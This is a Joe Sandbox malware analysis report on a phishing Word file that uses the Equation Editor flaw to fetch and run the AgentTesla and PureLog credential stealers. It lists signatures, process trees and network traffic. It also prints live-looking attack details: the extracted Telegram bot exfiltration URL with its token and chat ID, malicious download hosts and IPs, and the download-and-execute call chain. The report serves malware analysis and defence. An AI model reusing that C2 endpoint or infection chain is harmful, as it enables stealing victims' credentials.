Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REQUEST FOR QUOTATION.docx.doc

Overview

General Information

Sample name:REQUEST FOR QUOTATION.docx.doc
Analysis ID:1436756
MD5:d03e818c9b5e10f20be12369b980dcf4
SHA1:1b06f7e8918e40fe1fee605fdeb8fa008098b34d
SHA256:93c86de90e7a282f6999b7233cbb1b815bbdb8f1f103481b6f8ac0def74f88fe
Tags:doc
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains an external reference to another file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3148 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • html.exe (PID: 3220 cmdline: "C:\Users\user\AppData\Roaming\html.exe" MD5: 4C8B56B125AE41293AA6028204D44268)
        • html.exe (PID: 3296 cmdline: "C:\Users\user\AppData\Roaming\html.exe" MD5: 4C8B56B125AE41293AA6028204D44268)
    • AcroRd32.exe (PID: 3652 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
      • RdrCEF.exe (PID: 3824 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
  • mpTrle.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)
    • mpTrle.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)
  • mpTrle.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)
    • mpTrle.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage?chat_id=6410945890"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xc84:$obj2: \objdata
  • 0xc70:$obj3: \objupdate
  • 0xc4c:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xc84:$obj2: \objdata
  • 0xc70:$obj3: \objupdate
  • 0xc4c:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000010.00000002.656194441.0000000002407000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            9.2.html.exe.28cf3d0.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              9.2.html.exe.4f0000.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                9.2.html.exe.4f0000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  11.2.mpTrle.exe.251d10c.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    11.2.mpTrle.exe.251e124.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 29 entries

                      Exploits

                      barindex
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.33.34, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49172, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 104.168.33.34, SourceIsIpv6: false, SourcePort: 80
                      Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\html.exe, NewProcessName: C:\Users\user\AppData\Roaming\html.exe, OriginalFileName: C:\Users\user\AppData\Roaming\html.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3148, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\html.exe" , ProcessId: 3220, ProcessName: html.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\html.exe, NewProcessName: C:\Users\user\AppData\Roaming\html.exe, OriginalFileName: C:\Users\user\AppData\Roaming\html.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3148, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\html.exe" , ProcessId: 3220, ProcessName: html.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\html.exe, ProcessId: 3296, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle
                      Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\html.exe, QueryName: api.ipify.org
                      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 1516, Protocol: tcp, SourceIp: 109.71.253.25, SourceIsIpv6: false, SourcePort: 80
                      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1516, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1516, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeAvira: detection malicious, Label: HEUR/AGEN.1305639
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                      Source: C:\Users\user\AppData\Roaming\html.exeAvira: detection malicious, Label: HEUR/AGEN.1305639
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exeAvira: detection malicious, Label: HEUR/AGEN.1305639
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                      Source: 12.2.mpTrle.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage?chat_id=6410945890"}
                      Source: html.exe.3220.9.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage"}
                      Source: wbze.deVirustotal: Detection: 10%Perma Link
                      Source: https://wbze.de/u7xcVirustotal: Detection: 9%Perma Link
                      Source: http://wbze.de/u7xcVirustotal: Detection: 9%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exeVirustotal: Detection: 36%Perma Link
                      Source: C:\Users\user\AppData\Roaming\html.exeVirustotal: Detection: 36%Perma Link
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeVirustotal: Detection: 36%Perma Link
                      Source: REQUEST FOR QUOTATION.docx.docVirustotal: Detection: 9%Perma Link
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\html.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exeJoe Sandbox ML: detected

                      Exploits

                      barindex
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.33.34 Port: 80Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\html.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\html.exeJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49163 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: Binary string: lGeIZ.pdbSHA256) source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr
                      Source: Binary string: lGeIZ.pdb source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeDirectory queried: number of queries: 1006

                      Software Vulnerabilities

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_036106CB ShellExecuteW,ExitProcess,8_2_036106CB
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_0361062C
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0361069D URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_0361069D
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_036106F0 ExitProcess,8_2_036106F0
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_03610646 URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_03610646
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_036106B6 ShellExecuteW,ExitProcess,8_2_036106B6
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_036105B8 URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_036105B8
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_03610583 ExitProcess,8_2_03610583
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 4x nop then jmp 007318D1h9_2_007319B0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 4x nop then jmp 007318D1h9_2_00731C58
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 4x nop then jmp 00C018D1h11_2_00C019B0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 4x nop then jmp 00C018D1h11_2_00C01C58
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 4x nop then jmp 00BF18D1h14_2_00BF19B0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 4x nop then jmp 00BF18D1h14_2_00BF1C58
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: wbze.de
                      Source: global trafficDNS query: name: api.ipify.org
                      Source: global trafficDNS query: name: api.ipify.org
                      Source: global trafficDNS query: name: api.ipify.org
                      Source: global trafficDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.26.13.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.74.152:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
